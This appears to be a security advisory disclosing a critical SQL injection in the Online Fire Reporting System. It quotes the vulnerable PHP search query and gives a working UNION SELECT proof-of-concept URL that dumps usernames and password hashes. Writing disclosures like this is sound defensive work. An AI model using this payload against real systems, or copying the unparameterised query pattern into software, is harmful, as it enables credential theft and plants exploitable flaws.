SQL Injection - Online Fire Reporting System

May 21, 2022

Product Online Fire Reporting System
Product Link Link
Vulnerability SQL Injection
Severity Critical

Overview

SQL Injection is an attack where an attacker can maliciously inject their own code into a SQL query. This can lead to the attacker being able to dump arbitary data from the database.

The vulnerability is a result of using non-parameterised queries when fetching search results on the report search page inside the /report/list.php file.

<?php
if(isset($_GET['search'])):
$i = 1;
$qry = $conn->query("SELECT * from `request_list` where (fullname LIKE '%{$_GET['search']}%' or contact LIKE '%{$_GET['search']}%' or code LIKE '%{$_GET['search']}%') order by abs(unix_timestamp(date_created)) desc ");
while($row = $qry->fetch_assoc()):
?>

As the GET parameters provided by the user are not sanitised or parameterised, a user can inject their own query and end their query in a semicolon and a SQL comment, removing the end of the query and being able to control what data is returned.

This can be used to exfiltrate the username and passwords of all users on the platform. As the passwords are stored as unsalted MD5 hashes, these passwords would be very easy to crack through brute force.

POC Url:

http://localhost/?p=report/list&search=a%27)%20UNION%20SELECT%20null,%20null,username,password,%20null,%20null,%20null,%20null,%20null,%20null%20FROM%20users;%20--%20-

Usernames and passwords dumped through SQL injection

Remediation

The application should use parameterised queries to ensure that any user input is properly escaped.